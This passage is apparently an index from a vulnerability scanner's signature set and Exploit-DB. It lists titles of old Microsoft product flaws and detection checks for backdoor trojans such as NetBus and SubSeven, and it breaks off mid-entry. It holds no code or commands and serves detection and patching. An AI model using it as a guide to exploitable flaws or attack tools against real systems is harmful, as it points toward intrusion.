allow rendering of Web sites with incorrect Security Zone [7223] Microsoft Excel and PowerPoint malformed document macro execution [7202] Microsoft IIS 4.0/5.0 escaped percent found [7201] Microsoft IIS 4.0/5.0 malformed double percent sequence [7199] Microsoft IIS 4.0/5.0 malformed hex sequence [7188] Norton Utilities for Windows 95 &quot [7168] Microsoft Exchange OWA deeply-nested folder request denial of service [7118] Microsoft Outlook Express &quot [7093] Norton AntiVirus for Microsoft Exchange could reveal sensitive information to attackers [7089] Microsoft Exchange OWA could allow search of global address list [7052] Microsoft Outlook Express 6 file attachment security feature bypass [7039] Microsoft Exchange OWA denial of service [6995] Microsoft IIS %u Unicode wide character encoding detected [6994] Microsoft IIS %u Unicode encoding detected [6991] Microsoft ISA Server cross-site scripting [6990] Microsoft ISA Server Proxy Service memory leak denial of service [6989] Microsoft ISA Server H.323 Gatekeeper Service memory leak denial of service [6985] Microsoft IIS relative path usage in system file process table could allow elevated privileges [6984] Microsoft IIS specially-crafted SSI directives buffer overflow [6983] Microsoft IIS invalid MIME header denial of service [6982] Microsoft IIS WebDAV long invalid request denial of service [6981] Microsoft IIS URL redirection denial of service [6963] Microsoft IIS HTTPS connection could reveal internal IP address [6914] Multiple Microsoft products malformed RPC request denial of service [6883] Microsoft SFU Telnet denial of service [6882] Microsoft SFU NFS denial of service [6858] Microsoft IIS cross-site scripting patch denial of service [6831] Microsoft Outlook &quot [6800] Microsoft IIS device file request can crash the ASP processor [6748] Microsoft Internet Explorer &quot [6742] Microsoft IIS reveals .asp source code with Unicode extensions [6732] Microsoft Word allows embedded macro to bypass security settings [6730] Microsoft FrontPage Server Extensions Visual Studio RAD Support sub-component buffer overflow [6705] Microsoft IIS idq.dll ISAPI extension buffer overflow [6688] Microsoft Internet Explorer could allow remote attackers to view file contents from a victim`s hard drive [6684] Microsoft SQL Server cached connections could allow an attacker to gain access to the database [6655] Microsoft Outlook and Outlook Express Address Book allows attacker to spoof emails [6652] Microsoft Exchange 2000 OWA script execution [6651] Microsoft ISA Server Web Proxy denial of service caused by embedded code in HTML email [6614] Microsoft Word .asd file macros could automatically execute [6571] Microsoft Word RTF document automatic macro execution [6556] Microsoft Internet Explorer HTML code manipulation could alter the URL displayed in the address bar [6555] Microsoft Internet Explorer with certificate CRL checking enabled could allow Web site spoofing [6549] Microsoft IIS WebDAV lock method memory leak can cause a denial of service [6545] Microsoft IIS FTP weak domain authentication [6535] Microsoft IIS FTP wildcard processing function denial of service [6534] Microsoft IIS URL decoding error could allow remote code execution [6533] PC4800 WLAN network adapter card may reveal SSID(s) in Windows registry [6528] WLLUC WLAN network adapter card may reveal WEP encryption keys and SSID in Windows registry [6527] Apache Web Server for Windows and OS2 denial of service [6526] WLRBT WLAN network adapter card may reveal WEP encryption key and SSID in Windows registry [6525] CW10 WLAN network adapter card may reveal security information in Windows registry [6485] Microsoft IIS 5.0 ISAPI Internet Printing Protocol extension buffer overflow [6448] Microsoft Internet Explorer 5.x allows active scripts using XML stylesheets [6426] Microsoft Internet Explorer altering CLSID action allows malicious file execution [6405] Microsoft Data Access Component Internet Publishing Provider allows WebDAV access [6383] Microsoft ISA Server Web Proxy denial of service [6370] ORiNOCO AS client Windows NT Remote Access Service ppp.log reveals RADIUS user credentials [6361] ORiNOCO AS client software reveals wireless network name and RADIUS user credentials in Windows registry [6306] Microsoft Internet Explorer HTML emails with incorrect MIME headers could allow execution of code [6288] Microsoft Visual Studio VB-TSQL buffer overflow [6265] Microsoft invalid digital certificates could be used for spoofing [6238] Dagger backdoor for Windows 95/98 [6230] Microsoft Internet Explorer command execution with Telnet client in SFU [6205] Microsoft IIS WebDAV denial of service [6172] Microsoft Exchange malformed URL request denial of service [6171] Microsoft IIS and Exchange malformed URL request denial of service [6150] NetDemon backdoor for Windows 95/98 [6086] Microsoft Internet Explorer &quot [6085] Microsoft Internet Explorer scriptlet rendering could allow Web site operators to read files [6029] Microsoft IIS CmdAsp could allow remote attackers to gain privileges [5938] Microsoft Internet Explorer mshtml.dll denial of service [5903] Microsoft IIS 5.0 allows the viewing of files through malformed URL [5823] Microsoft IIS Web form submission denial of service [5785] Microsoft Media Services dropped connection denial of service [5729] Microsoft IIS Far East editions file disclosure [5622] Microsoft SQL XP srv_paraminfo() buffer overflow [5615] Microsoft Internet Explorer file upload form [5614] Microsoft Internet Explorer print template [5575] Microsoft Media Player .WMS script execution [5574] Microsoft Media Player .ASX buffer overflow [5566] Microsoft Internet Explorer 5.5 index.dat file can be used to remotely execute code [5541] CrazzyNet backdoor for Windows [5537] Microsoft Exchange Server has a known username and password [5510] Microsoft Internet Information Service (IIS) ISAPI buffer overflow [5508] Microsoft Outlook client reveals physical path [5504] Microsoft Internet Explorer &quot [5500] Tini backdoor for Windows [5494] Microsoft FrontPage 98 Server Extensions fpcount.exe CGI can be remotely crashed [5470] Microsoft Internet Information Service (IIS) invalid executable filename passing [5458] Rux Tick backdoor for Windows [5441] Microsoft IIS .htw cross-site scripting [5389] Event Horizon backdoor for Windows [5377] Microsoft IIS Unicode translation error allows remote command execution [5367] Microsoft Internet Explorer cached info [5362] Remote Storm backdoor for Windows [5356] Snid X2 backdoor for Windows [5335] Microsoft IIS Index Server directory traversal [5329] Host Control backdoor for Windows [5328] GayOL backdoor for Windows and AOL [5324] TransScout backdoor for Windows [5322] Microsoft Word Mail Merge [5304] Chupacabra backdoor for Windows [5293] Microsoft Internet Explorer exposes users files [5263] Microsoft Office 2000 executes .dll without users knowledge [5202] Microsoft IIS invalid URL allows attackers to crash service [5175] Microsoft Outlook and Outlook Express vCards buffer overflow [5156] Microsoft IIS Cross-Site Scripting [5147] Microsoft Money plain-text password [5127] Microsoft Virtual Machine java applet allows malicious Web site to masquerade as visitor [5124] Microsoft FrontPage Server Extensions device name denial of service [5106] Microsoft IIS 4.0 discloses internal IP addresses [5104] Microsoft IIS allows remote attackers to obtain source code fragments using +.htr [5086] Qaz backdoor for Windows [5080] Microsoft Office 2000 HTML object tag buffer overflow [5075] Microsoft Internet Explorer &quot [5071] Microsoft IIS canonicalization error applies incorrect permissions to certain types of files [5025] Infector backdoor for Windows [5016] Microsoft Excel register.id function [5013] Microsoft Outlook and Outlook Express cache bypass [4960] Microsoft IIS on Win2kPro security button restriction [4953] Microsoft Outlook date header buffer overflow [4951] Microsoft IIS absent directory browser argument [4933] Microsoft SQL Enterprise Manager password disclosure [4899] Microsoft FrontPage Extensions shtml.dll multiple access denial of service [4893] Microsoft mail clients denial of service [4883] Service ticket granted to a Windows 2000 security principal [4864] Authentication ticket granted to a Windows 2000 security principal [4863] Security identifier failed to be written to Windows 2000 security principal sIDHistory [4862] Security identifier added to Windows 2000 security principal sIDHistory [4849] Asylum RAT (Remote Access Tool) backdoor for Windows [4848] Connection backdoor for Windows 95/98 [4845] SniperNet backdoor for Windows 95/98 [4842] Microsoft Internet Explorer and Microsoft Powerpoint 2000 ActiveX object execution [4841] Microsoft Internet Explorer and Microsoft Access 2000 VBA code execution [4814] Syphillis backdoor for Windows 95/98 [4790] Microsoft IIS \mailroot\pickup directory denial of service [4789] Swift Remote backdoor for Windows 95/98 [4757] Microsoft IIS server-side includes (SSI) #exec directive [4710] Norton AntiVirus for Microsoft Exchange unzip buffer overflow [4709] Norton AntiVirus for Microsoft Exchange may enter &quot [4679] Microsoft DNS Server - Name offset exceeding DNS message packet length [4678] Microsoft DNS Server using a large amount of memory [4677] Microsoft DNS Server - Invalid DNS UPDATE message in DNS packet [4676] Microsoft DNS Server - excessive bad packets received [4675] Microsoft DNS Server - Invalid domain name offset in DNS message packet [4672] Logon attempt failure reported by Windows Service Control Manager [4663] Microsoft DNS Server - Invalid domain name [4654] Microsoft DNS Server - Invalid domain name in DNS message packet [4637] Microsoft DNS Server - Domain name exceeding maximum packet length [4635] Microsoft DNS Server - CNAME loop during caching [4627] Microsoft Internet Explorer fails to revalidate certificates within the same session [4624] Microsoft Internet Explorer fails to validate certificates in images or frames [4601] Microsoft Internet Explorer HTML Help file code execution [4582] Microsoft SQL Server DTS package reveals passwords [4569] NetOp bypasses Windows NT security to retrieve files [4558] Microsoft IIS is installed on a domain controller [4500] Microsoft Internet Explorer frame domain verification [4496] Y3K RAT backdoor for Windows [4484] Microsoft FrontPage Server Extensions image mapping components allow remote code execution [4456] Microsoft Internet Explorer external.NavigateAndFind function bypasses cross-frame security [4448] Microsoft IIS ISM.DLL could allow users to read file contents [4447] Microsoft Internet Explorer bug allows Web page operator to view cookie [4446] Microsoft Outlook Express filename overflow could allow attacker to execute files [4445] Microsoft Office UA Control malicious Web operator [4439] Microsoft FrontPage Server Extensions&quot [4430] Microsoft IIS malformed URL extension data denial of service [4399] Microsoft Commercial Internet System (MCIS) Mail server IMAP buffer overflow [4397] NetBIOS requests with a NULL source address can cause Windows 9x to become unstable [4392] Microsoft IIS could reveal source code of ASP files in some virtual directories [4339] Glacier backdoor for Windows [4333] Microsoft FrontPage 98 Server Extensions DVWSSR.DLL file buffer overflow [4302] Microsoft IIS malformed AuthChangUrl request can cause the server to stop servicing requests [4280] Microsoft DNS resolver may accept responses from non-queried hosts [4279] Microsoft IIS escape characters denial of service [4268] Microsoft FrontPage 98 Server Extensions DVWSSR.DLL file could allow remote ASP source retrieval [4232] Microsoft Index Server idq.dll allows remote directory traversal [4227] Microsoft Index Server webhits.dll reveals source of ASP files [4224] Microsoft Excel XLM macros do not generate warning messages [4204] Microsoft IIS virtual UNC share source read [4183] Microsoft IIS could disclose path of network shares [4165] NetSpy 1.2 backdoor for Windows [4152] Microsoft Outlook allows users to manipulate hidden drives [4150] Telecommando backdoor for Windows 95/98 [4149] Satans Backdoor for Windows [4148] Donald Dick backdoor for Windows [4146] Master`s Paradise98 backdoor for Windows [4145] NCX backdoor for Windows [4144] Devil backdoor for Windows [4117] Microsoft IIS chunked encoding post or put denial of service [4110] Microsoft SQL Server remote query abuse [4109] Microsoft Clip Art Gallery CIL file buffer overflow [4105] Sockets de Troie (Socket23) backdoor for Windows [4061] Funtime Apocalypse denial of service tool for Windows [3996] Microsoft Internet Explorer image source redirect [3986] Microsoft IIS ASP could be used to gain sensitive information [3959] Microsoft Direct Access Object (DAO) or JET method denial of service [3892] Microsoft IIS Long URL with excessive forward slashes passed to ASP causes an access violation [3890] Microsoft Index Server error could reveal sensitive path information [3854] Microsoft Office 2000 security setting [3837] Microsoft Internet Explorer Suite 4 HTML buffer overflow [3803] Microsoft Internet Explorer directshow filter (MSDXM.OCX) buffer overflow [3722] A Windows NT user can use SUBST to map a drive letter to a folder [3675] Microsoft DNS server cache pollution can occur if DNS spoofing has been encountered [3668] Microsoft Internet Explorer Cross Frame could be used to view files on client computers [3666] Microsoft Internet Explorer Web Proxy Auto-Discovery could allow clients to accept untrusted proxy setting information [3558] Print Operators group in Windows 2000 contains a suspicious member who might not be authorized [3468] Driver Signing check in Windows 2000 may be disabled to allow non-signed driver to be installed [3443] Domain Administrator group in Windows 2000 contains a suspicious member who might not be authorized [3393] Microsoft FrontPage Extensions authors.pwd file could reveal encrypted passwords [3391] Microsoft FrontPage Extensions service.pwd file could reveal encrypted passwords [3378] Microsoft Virtual Machine could allow a malicious Java applet to bypass security restrictions [3371] Microsoft Excel imports and runs Lotus 1-2-3 or Quattro Pro macros without warning [3326] Total Eclypse backdoor FTP server for Windows [3311] Microsoft Internet Explorer registration wizard ActiveX buffer overflow [3306] Microsoft IIS could allow remote access to servers marked as Restrict Access [3268] Microsoft Internet Explorer uses weak encryption [3246] Microsoft HTML table form Denial of Service [3244] Microsoft Scriptlet.typelib and Eyedog ActiveX controls are unsafe [3222] BackConstruction backdoor for Windows [3221] Microsoft SQL Server 6.5 non-trusted connection successful [3220] Microsoft SQL 6.5 Server shutdown [3219] Microsoft SQL Server 6.5 started [3218] Microsoft SQL Server failed connection [3217] Microsoft SQL Server non-trusted connection successful [3216] Microsoft SQL Server shutdown [3215] Microsoft SQL Server started [3214] Microsoft SQL Server trusted connection successful [3201] Microsoft SQL Server login failed - user not trusted [3200] Microsoft SQL Server login failed - user not Administrator [3199] Microsoft SQL Server login failed - invalid user [3198] Microsoft SQL Server login failed - too many users [3197] Microsoft SQL Server login failed [3196] Microsoft LDAP server blacklist failed [3195] Microsoft LDAP server permanent blacklist [3194] Microsoft LDAP server temporary blacklist [3162] BigGluck backdoor for Windows [3161] Ultors backdoor for Windows [3156] Microsoft Jet Text I-ISAM allows users to alter system files [3155] Microsoft Jet VBA shell execution [3151] StealthSpy backdoor for Windows [3150] ServeMe backdoor for Windows 95/98 [3149] The Unexplained 1.0 backdoor for Windows 95/98 and Windows NT [3148] SecretService backdoor for Windows 95/98 [3147] Truva 1.2 backdoor for Windows 95/98 [3143] RWS backdoor for Windows [3131] AOL Admin backdoor for Windows and AOL [3130] Doly backdoor for Windows [3122] Deltasource backdoor for Windows [3120] The Thing backdoor for Windows [3119] Progenic backdoor for Windows 95/98 and Windows NT [3118] Schwindler backdoor for Windows 95/98 [3117] Microsoft FrontPage long URL buffer overflow [3115] Microsoft IIS and SiteServer denial of service caused by malformed HTTP requests [3113] Hacker`s Paradise backdoor for Windows 95/98 and Windows NT [3112] Prosiak backdoor for Windows [3111] Millenium backdoor for Windows [3110] HVL-RAT backdoor for Windows and AOL [3100] Frenzy backdoor for Windows 95/98 [3099] Blazer5 backdoor for Windows 95/98 and Windows NT [2761] Microsoft Office 97 files are out of date [2686] Microsoft Outlook long file name patch not applied [2685] Microsoft Outlook Express long file name patch not applied [2675] Microsoft IIS 4.0 samples installation on Web server [2673] Microsoft IIS samples installation on Web server [2671] Microsoft IIS Passive FTP patch not applied (asp.dll out of date) [2670] Microsoft IIS Passive FTP patch not applied (wam.dll out of date) [2669] Microsoft IIS Passive FTP patch not applied (w3svc.dll out of date) [2668] Microsoft IIS Passive FTP patch not applied (infocomm.dll out of date) [2662] Microsoft IIS CGI overflow [2661] Microsoft Internet Explorer MK overrun [2444] Microsoft Internet Explorer unsigned ActiveX download [2412] Microsoft IIS account is member of Domain Users [2390] NetMonitor backdoor for Windows 95/98 and Windows NT [2389] Backdoor2 for Windows [2387] Forced Entry backdoor for Windows [2386] Coma backdoor for Windows 95/98 [2381] Microsoft IIS and SiteServer Showcode.asp sample file allows remote file viewing [2326] phAse zero backdoor for Windows 95/98 and Windows NT [2324] GirlFriend backdoor for Windows [2323] Portal of Doom backdoor for Windows [2322] GateCrasher backdoor for Windows [2321] NetSphere backdoor for Windows and ICQ [2310] EvilFTP backdoor FTP server for Windows [2302] Microsoft IIS using double-byte code pages could allow remote attackers to retrieve source code [2290] DeepThroat backdoor for Windows [2283] CMail server for Windows installs with a default administrator password [2282] Microsoft IIS bdir.htr allows remote traversal of directory structure [2281] Microsoft IIS buffer overflow in HTR requests can allow remote code execution [2252] Microsoft Jet database engine allows embedded VBA strings, which could allow execution of commands [2245] SubSeven backdoor for Windows [2244] Microsoft Internet Explorer favorites feature malicious icon file [2229] Microsoft IIS ExAir sample site denial of service [2216] Microsoft Internet Explorer crossframe vulnerability allows scripts to run in elevated context [2214] Microsoft Internet Explorer Son of Cuartango issue allows remote file retrieval [2213] Microsoft Internet Explorer Untrusted Scripted Paste issue could allow remote file retrieval [2209] Microsoft Internet Explorer treats dotless IP addresses as members of the local Intranet zone [2204] Timbuktu is a remote control server for Macintosh and Windows computer [2186] Microsoft Excel virus warning features could possibly be bypassed by malicious files [2185] Microsoft IIS and Site Server sample programs can be used to remotely view files [2173] Microsoft Internet Explorer FSO could allow remote file manipulation from a Web server [2161] Microsoft Internet Explorer DHTML edit control can be used to read arbitrary files [2142] Microsoft SQL Server allows users of remote SQL Servers to connect allowing unauthorized users of those servers access [2140] Microsoft SQL Server trojan horse found in system stored procedures [2139] Unencrypted Microsoft SQL Server triggers found [2136] Microsoft SQL Server device files should be on NTFS partitions [2134] Microsoft SQL Server backups should be performed regularly [2133] Microsoft SQL Server replication is enabled [2132] Microsoft SQL Server Trace Flags should be off [2130] Microsoft SQL Server protocols found that allow packet sniffing [2128] Microsoft SQL Server bug found that prohibits revoke permissions on certain tables [2119] Microsoft SQL Server registry extended stored procedures found that could be used to read or write to the registry [2095] Microsoft SQL Server OLE Automation extended stored procedures were found that can be used to reconfigure the security of other services [2094] Microsoft SQL Server password encryption is not enabled for all login Ids [2093] The account under which the Microsoft SQL Server service is running is not in compliance with policy [2092] Microsoft SQL Server extended stored procedure xp_sprintf buffer overflow [2077] Microsoft SQL Server extended stored procedure xp_sqlinventory can be used to crash SQL Server [2070] Microsoft Internet Explorer allows remote files to be retrieved by a malicious user [2069] Microsoft Internet Explorer can allow malicious pages to spoof legitimate, trusted sites [2036] Microsoft PWS could be exploited to remotely read arbitrary files [1969] Microsoft Exchange LDAP denial of service [1823] Microsoft IIS long GET request denial of service [1822] ARCserver Windows NT backup agents use very weak encryption for passwords [1803] Unencrypted Microsoft SQL Server stored procedures found [1780] Microsoft Office 98 documents may be saved with sensitive information [1774] Microsoft Access databases use weak passwords [1770] Microsoft SQL Server SQLMail allows logins to send email [1769] Latest Microsoft SQL Server Service Packs are not installed [1764] Latest Windows NT Service Pack is not installed [1762] Microsoft SQL Server permissions on extended stored procedures found that are not in compliance with policy [1761] Microsoft SQL Server is configured to execute stored procedures at startup that could be used as backdoors [1760] Microsoft SQL Server statement permissions found that are granted to users other than dbo [1759] Microsoft SQL Server objects not owned by database owner [1757] Microsoft SQL Server allows direct system table updates to be denied [1750] Microsoft SQL Server logins during unauthorized hours found [1749] Microsoft SQL Server permissions on system tables found granted to public [1737] Microsoft Excel CALL function can execute programs without user warning [1735] Microsoft IIS with Visual InterDev no authentication [1715] Microsoft SQL Server object permissions granted to groups are non-compliant with policy [1714] Microsoft SQL Server user permissions found that are not in compliance with policy [1713] Microsoft SQL Server Enterprise Manager leaves traces of unencrypted sa password in registry when changing authentication mode of a registered server [1712] Microsoft SQL Server Enterprise Manager leaves traces of previous unencrypted sa passwords in registry [1711] Microsoft SQL Server Enterprise Manager stores unencrypted sa password in registry [1710] Microsoft SQL Server integrated logins found and should be reviewed [1709] Microsoft SQL Server guest user IDs found [1708] Microsoft SQL Server stale logins found [1705] Microsoft SQL Server orphaned user IDs found that could result in unauthorized permissions being granted [1704] Microsoft SQL Server mismatched user IDs could result in granting of unauthorized permissions [1703] Microsoft SQL Server can be configured to audit failed or successful logins [1702] Microsoft SQL Server can be configured for different authentication methods [1701] Microsoft SQL Server set to view NT username, not hostname when viewing current users [1700] Microsoft SQL Server guest login found [1697] Microsoft SQL Server allows easily-guessed passwords [1675] Microsoft Internet Explorer 4.0 connection-reuse problem [1656] Microsoft IIS 4.0 allows user to avoid HTTP request logging [1654] Microsoft IIS remote FTP buffer overflow [1652] Quakenbush Password Appraiser publishes Windows NT user passwords to the Internet [1638] Microsoft IIS crashes processing some GET commands [1530] Microsoft IIS 3.0 newdsn.exe sample application allows remote creation of arbitrary files [1459] Blank sa password on Microsoft SQL Server [1458] Blank probe password found on Microsoft SQL Server [1457] Microsoft SQL server detection (TCP) [1451] Microsoft SQL Server detection (named pipes) [1422] CSM Proxy 4.1 remote buffer overflow crashes proxy and underlying Windows NT system [1383] Microsoft TCP/IP allows an attacker to reset connections [1376] Microsoft Proxy 2.0 denial of service [1368] Microsoft IIS 4.0 allows file execution in the Web site directory [1354] Windows NT Domain Administrators group includes non-default user [1273] Microsoft IIS special characters allowed in shell [1272] Microsoft IIS CGI scripts run as system [1271] Microsoft IIS version 2 installed [1270] Microsoft IIS incorrect permissions on restricted item [1269] Microsoft IIS incorrect Web permissions [1268] Microsoft IIS SSI #exec enabled [1228] NetBus trojan horse for Windows [1226] Microsoft DNS Server - DNS Zone Transfers from high ports [1223] Microsoft Exchange Server SMTP and NNTP denial of service [1216] Microsoft IIS SSL patch not applied [1215] Microsoft IIS Passive FTP patch not applied [1212] Microsoft IIS unauthorized ODBC data access with RDS [1211] Remote DeskLink for Windows 95 is installed [1125] Microsoft IIS ASP DATA issue could reveal source code [949] Microsoft IIS server script debugging enabled [948] Microsoft IIS samples installed on Web server [943] Microsoft Office installed on Web server [936] Microsoft IIS NTFS insecure permissions [935] Microsoft IIS executable paths [917] Microsoft Internet Explorer MK overrun [916] Microsoft Internet Explorer Embed issue [910] Microsoft Office 97 files are out of date [908] Microsoft FrontPage extensions under Unix create world readable password files [621] Microsoft IIS 3.0 script source revealed by appending 2E to requests [587] Microsoft Internet Explorer Freiburg text viewing issue [562] Microsoft Office file manager allows users to see files without access [561] Microsoft FrontPage 1.1 allows users to write to executable directories [533] Program exists to replace a password on a Windows NT computer [527] L0phtCrack 1.5 can crack Windows NT passwords [470] Microsoft Excel passwords are easily cracked [463] Microsoft Internet Explorer 3.0 allows remote command execution [462] Microsoft Internet Explorer 3.0.1 .ISP script file execution [459] Microsoft Internet Explorer divulges sensitive information in response to NTLM requests [456] Microsoft Internet Explorer and Netscape Java applets can open network connections to a server [397] Microsoft cd .. Bug [387] SMB NetBIOS Test: Possible Windows NT dotdot denial of service [385] Microsoft Internet Explorer has the check security certificate before sending option disabled [362] Microsoft Internet Explorer entering/leaving a secure site warning disabled [361] Microsoft Internet Explorer is outdated [360] Microsoft Internet Explorer non-secure form submission warning is disabled [359] Microsoft Internet Explorer has Java enabled [358] Microsoft Internet Explorer Form redirection enabled [357] Microsoft Internet Explorer has check security certificate before viewing option disabled [356] Microsoft Internet Explorer allows secure content to be cached [355] Microsoft Internet Explorer allows ActiveX controls to be automatically executed [354] Microsoft Internet Explorer active scripting is enabled [353] Microsoft Internet Explorer allows active content to be automatically downloaded [352] Microsoft Internet Explorer has low active content security [351] Microsoft Internet Explorer accept cookies warning disabled [336] Microsoft IIS ASP dot bug [295] WebSite 1.1 for Windows NT winsample buffer overflow [256] Microsoft IIS can be remotely crashed by excessively long client requests [185] Unknown Windows service [7] Microsoft IIS ASP source visible Exploit-DB - https://www.exploit-db.com: [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [30645] Microsoft Windows URI Handler Command Execution Vulnerability [30636] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2) [30635] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1) [30619] Microsoft Windows Explorer PNG Image - Local Denial Of Service Vulnerability [30462] Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability [30392] Microsoft Windows ndproxy.sys - Local Privilege Escalation [30160] Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability [29813] Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability [29771] Microsoft Windows Vista Windows Mail Local File Execution Vulnerability [29738] Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability [29659] Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [29286] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [29285] Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS [28834] Microsoft Windows XP CMD.EXE Buffer Overflow Vulnerability [28482] MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution [28420] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [28381] microsoft windows xp/2000/2003 help Multiple Vulnerabilities [28357] Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability [28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability [28263] Microsoft Windows XP/2000/2003 Remote Denial of Service Vulnerability [28227] Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability [27930] Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability [27851] Microsoft Windows - Path Conversion Weakness [27051] Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities [26690] Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability [26341] Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability [26323] Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability [26222] Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness [25737] Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service Vulnerability [25454] Microsoft Windows 98/2000 Explorer Preview Pane Script Injection Vulnerability [25384] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2) [25383] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1) [25268] Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability [25259] Microsoft Windows XP Local Denial of Service Vulnerability [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25050] Microsoft Windows 2000/2003/XP winhlp32 Phrase Heap Overflow Vulnerability [25049] Microsoft Windows 2000/2003/XP winhlp32 Phrase Integer Overflow Vulnerability [24699] Microsoft Windows XP WAV File Handler Denial of Service Vulnerability [24682] Microsoft Windows XP Weak Default Configuration Vulnerability [24605] Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability [24277] Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability [24173] PHP 4.3.x Microsoft Windows Shell Escape Functions Command Execution Vulnerability [24125] Microsoft Windows XP Self-Executing Folder Vulnerability [24051] Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability [23989] Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability [23850] Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability [23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [23675] Microsoft Windows XP HCP URI Handler Arbitrary Command Execution Vulnerability [23504] Microsoft Windows XP/2000 showHelp CHM File Execution Weakness [23247] Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability [23229] Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability [23210] Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability [23179] Oracle MySQL for Microsoft Windows MOF Execution [23101] Microsoft Windows 98 Fragmented UDP Flood Denial of Service Vulnerability [23093] Microsoft Windows XP TCP Packet Information Leakage Vulnerability [23019] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [22883] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) [22882] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) [22870] Microsoft Windows XP/2000 RunDLL32.EXE Buffer Overflow Vulnerability [22837] Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow [22824] Microsoft Windows XP/2000/NT 4 HTML Converter HR Align Buffer Overflow Vulnerability [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [22570] Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability [22528] Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability [22368] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) [22367] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) [22366] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) [22365] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) [22354] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [22303] Microsoft Windows Help program (WinHlp32.exe) Crash PoC [22289] Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability [22255] Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability [22245] Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow Vulnerability [22232] Microsoft Windows XP HCP URI Buffer Overflow Vulnerability [22225] Microsoft Windows XP Redirector Privilege Escalation Vulnerability [22194] Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability [22132] Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability [21954] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4) [21953] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3) [21952] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2) [21951] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1) [21717] Microsoft Windows XP HCP URI Handler Abuse Vulnerability [21670] Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability [21485] Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability [21389] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) [21388] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) [21344] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [21258] Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability [21246] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2) [21245] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1) [21240] Microsoft Windows XP .Manifest Denial of Service Vulnerability [21172] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2) [21171] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1) [21131] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [21130] Microsoft Windows NT 3/4 CSRSS Memory Access Violation Vulnerability [21123] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [21099] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [21069] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [21047] Microsoft Windows NT 4.0 